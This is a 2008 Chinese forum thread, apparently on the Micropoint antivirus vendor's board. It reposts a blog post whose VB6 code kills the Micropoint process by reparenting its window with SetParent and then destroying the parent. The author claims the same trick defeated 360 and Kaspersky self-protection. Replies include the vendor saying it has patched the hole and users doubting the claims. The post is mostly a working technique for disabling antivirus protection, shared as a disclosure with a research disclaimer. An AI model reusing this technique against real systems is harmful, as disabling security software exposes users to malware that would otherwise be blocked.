Board logo

标题: VB6 [打印本页]
作者: 点饭的百度空间     时间: 2008-5-2 17:47    标题: VB6

作者 517826104   2008-04-08 17:22
http://hi.baidu.com/517826104/bl ... 48a1e909fa9350.html

微点,不错的一个杀软,用“主动防御”的思路拦截病毒,在中国来说是一个创新,

和流行的杀毒软件一样,他也弄了进程保护(虽然在任务管理器里面还是可以杀掉他的进程,这应该是软件故意在“放水”)。

不过在这次的试验中,微点的进程出人意料的被我用一个很简陋的办法干掉了!

还是 SetParent 大法,可能只要找准窗口的句柄,再好的 SYS 都没用把(用这个办法我已经成功破解360等软件的自我保护,甚至是废掉卡巴!)

以下是实现具体的过程思路:

创建窗口 CreateWindowEx

想办法查找窗口的句柄(现在还没有很好的办法,不过用 GetForegroundwindow 在右键托盘图标的时候可以获得)

设置父容器 SetParent

销毁自己的窗口 DestroyWindow

就是用我以前提过的 SetParent 大法就能干掉微点。(由于是试验,我只用了VB写代码VC的代码正在整理中,周末再发。。^_^)

VB6的:

声明API:

SetParent ,GetForegroundWindow ,GetWindowText

两个FORM添加一个TIMER到窗体FORM1里面,然后输入代码

'By ChiChou ,QQ517826104 ,本代码仅供研究学习,如有任何人或组织用以编写恶意程序,作者将不符任何法律责任!

'(小声地:我只有15岁,按理说POLICE是不会抓我的吧~~~~ ^_^)

Private Sub Timer1_Timer() '这个计时器用来关闭微点
    Dim winTitle As String
    Dim i As Long
    Dim tmpHwnd As Long

    sString = Space(255) '缓冲区,,做过类似程序的人应该知道是怎么回事
    ssLong = Len(sString)
    tmpHwnd = GetForegroundWindow() '获得前台窗口

    'Call SendMessage(tmpHwnd, WM_GETTEXT, 255, ByVal sString)
    Call GetWindowText(tmpHwnd, sString, ssLong) '取得窗口标题
    sString = LCase(sString)
    Debug.Print sString

     If InStr(sString, "微点") <> 0 Then '是微点的窗口
           Load Form2 '销毁!
           Call SetParent(tmpHwnd, Form2.hWnd)
           Unload Form2
     End If '这时候微点就挂了

End Sub

按F5试验一下。您只需要单击一下微点的托盘图标,微点就跟您再见了!

[ Last edited by 点饭的百度空间 on 2009-1-7 at 23:59 ]
作者: Legend     时间: 2008-5-2 17:51
感谢反黑版主的反馈,此方法微点最新版本已经针对其做了处理,加强了对自身进程的保护。
作者: gudan     时间: 2008-5-2 22:10
哈哈,~~都爆漏了
作者: jaber     时间: 2008-5-3 09:58
点饭的百度空间是MJ???


纯属爆料
作者: 点饭的百度空间     时间: 2008-5-3 10:25
楼上都搞错啦 那个517826104不是反黑
作者: 点饭的百度空间     时间: 2008-5-6 12:01


  Quote:
Originally posted by qq517826104 at 2008-5-5 17:20:
你们在说我么,哈哈
The code is Writen by me...

就是他就是他!! 过微点的就是他 绑起来烤了:D
作者: 囚中城     时间: 2008-5-7 18:16
作者才15岁?
作者: gudan     时间: 2008-5-7 23:46


  Quote:
Originally posted by 点饭的百度空间 at 2008-5-6 12:01:


就是他就是他!! 过微点的就是他 绑起来烤了:D

:lol:好野蛮的mm
作者: canel     时间: 2008-5-8 22:56
吹吧你就.卡巴 你干掉一个我看看..
作者: canel     时间: 2008-5-8 22:57
别用修改时间和恢复SSDT段.你干掉一个。 我看一下。
作者: ma2235153     时间: 2008-5-25 18:39
15岁能弄编程,天才
作者: kangdell     时间: 2008-7-16 12:16
列害



欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/) bbs.micropoint.com.cn